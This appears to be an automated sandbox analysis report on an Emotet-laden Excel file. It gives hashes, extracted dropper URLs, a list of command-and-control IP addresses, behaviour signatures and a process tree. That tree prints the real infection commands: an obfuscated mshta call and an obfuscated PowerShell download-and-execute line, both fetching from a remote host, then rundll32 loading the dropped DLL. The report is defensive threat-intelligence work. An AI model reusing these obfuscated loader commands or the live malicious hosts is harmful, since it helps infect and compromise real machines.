Analysis

  • max time kernel
    124s
  • max time network
    154s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:44

General

  • Target

    Form - Jan 28, 2022.xls

  • Size

    46KB

  • MD5

    acfe7d6340b879f65260e326e9363cae

  • SHA1

    7ede3c78229a8b40f993a8130dea7eaa623a42ce

  • SHA256

    711cce17f03661006598a1c6888aece3145f54a9d47cdd7780644d0ea7e34608

  • SHA512

    7c9b108e4abb276f19df16f629ff847cf7bfeb6812bacb87f789260dedbac81c9e4ac414ae088511a3c063154b16ebab7f928e8b37720815f076bb94263354d3

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Form - Jan 28, 2022.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3128
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3236
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1172
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:992
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vikgqarjkkeuqgpz\takv.zxu",gqvZ
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3564
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vikgqarjkkeuqgpz\takv.zxu",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1884
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2644 -s 1672
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3932

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    01ec9e30d38617c7e5c19511cdcc356b

    SHA1

    ca77a7a1aecb6105c45c7949a24a827666186317

    SHA256

    be85203f96196345fb653dc5eea59e97f5ae267bb452c92a228f3cdce366ab61

    SHA512

    1ba2764d4800091017a921b4b31dfcc91ad9ddd6e9cdedf8f0f68a54e8761ae4137f853b0c5174265ce2d2c0fc0dea838d07e9319593eba7dfa220c2a216d2c7

  • \ProgramData\QWER.dll
    MD5

    01ec9e30d38617c7e5c19511cdcc356b

    SHA1

    ca77a7a1aecb6105c45c7949a24a827666186317

    SHA256

    be85203f96196345fb653dc5eea59e97f5ae267bb452c92a228f3cdce366ab61

    SHA512

    1ba2764d4800091017a921b4b31dfcc91ad9ddd6e9cdedf8f0f68a54e8761ae4137f853b0c5174265ce2d2c0fc0dea838d07e9319593eba7dfa220c2a216d2c7

  • \ProgramData\QWER.dll
    MD5

    01ec9e30d38617c7e5c19511cdcc356b

    SHA1

    ca77a7a1aecb6105c45c7949a24a827666186317

    SHA256

    be85203f96196345fb653dc5eea59e97f5ae267bb452c92a228f3cdce366ab61

    SHA512

    1ba2764d4800091017a921b4b31dfcc91ad9ddd6e9cdedf8f0f68a54e8761ae4137f853b0c5174265ce2d2c0fc0dea838d07e9319593eba7dfa220c2a216d2c7

  • memory/992-338-0x0000000005630000-0x0000000005655000-memory.dmp
    Filesize

    148KB

  • memory/992-334-0x00000000054A0000-0x00000000054C5000-memory.dmp
    Filesize

    148KB

  • memory/992-332-0x0000000005440000-0x0000000005465000-memory.dmp
    Filesize

    148KB

  • memory/992-330-0x00000000053E0000-0x0000000005405000-memory.dmp
    Filesize

    148KB

  • memory/992-328-0x0000000005280000-0x00000000052A5000-memory.dmp
    Filesize

    148KB

  • memory/992-323-0x00000000051A0000-0x00000000051C5000-memory.dmp
    Filesize

    148KB

  • memory/992-316-0x0000000004B30000-0x0000000004B55000-memory.dmp
    Filesize

    148KB

  • memory/1292-313-0x0000000004F00000-0x0000000004F25000-memory.dmp
    Filesize

    148KB

  • memory/1884-348-0x0000000005320000-0x0000000005345000-memory.dmp
    Filesize

    148KB

  • memory/1884-354-0x00000000055F0000-0x0000000005615000-memory.dmp
    Filesize

    148KB

  • memory/1884-366-0x0000000005860000-0x0000000005885000-memory.dmp
    Filesize

    148KB

  • memory/1884-356-0x00000000057E0000-0x0000000005805000-memory.dmp
    Filesize

    148KB

  • memory/1884-352-0x00000000054F0000-0x0000000005515000-memory.dmp
    Filesize

    148KB

  • memory/1884-350-0x0000000005400000-0x0000000005425000-memory.dmp
    Filesize

    148KB

  • memory/1884-346-0x0000000005240000-0x0000000005265000-memory.dmp
    Filesize

    148KB

  • memory/1884-344-0x0000000005160000-0x0000000005185000-memory.dmp
    Filesize

    148KB

  • memory/1884-341-0x0000000004A30000-0x0000000004A55000-memory.dmp
    Filesize

    148KB

  • memory/2460-382-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-118-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-117-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-116-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-128-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp
    Filesize

    64KB

  • memory/2460-129-0x00007FFFAB270000-0x00007FFFAB280000-memory.dmp
    Filesize

    64KB

  • memory/2460-385-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-115-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-121-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-384-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/2460-383-0x00007FFFAE560000-0x00007FFFAE570000-memory.dmp
    Filesize

    64KB

  • memory/3236-317-0x000001D61F090000-0x000001D637190000-memory.dmp
    Filesize

    385.0MB

  • memory/3236-305-0x000001D61F090000-0x000001D637190000-memory.dmp
    Filesize

    385.0MB

  • memory/3236-300-0x000001D6378C0000-0x000001D637936000-memory.dmp
    Filesize

    472KB

  • memory/3236-310-0x000001D61F090000-0x000001D637190000-memory.dmp
    Filesize

    385.0MB

  • memory/3236-288-0x000001D6370F0000-0x000001D63712C000-memory.dmp
    Filesize

    240KB

  • memory/3236-268-0x000001D61F050000-0x000001D61F072000-memory.dmp
    Filesize

    136KB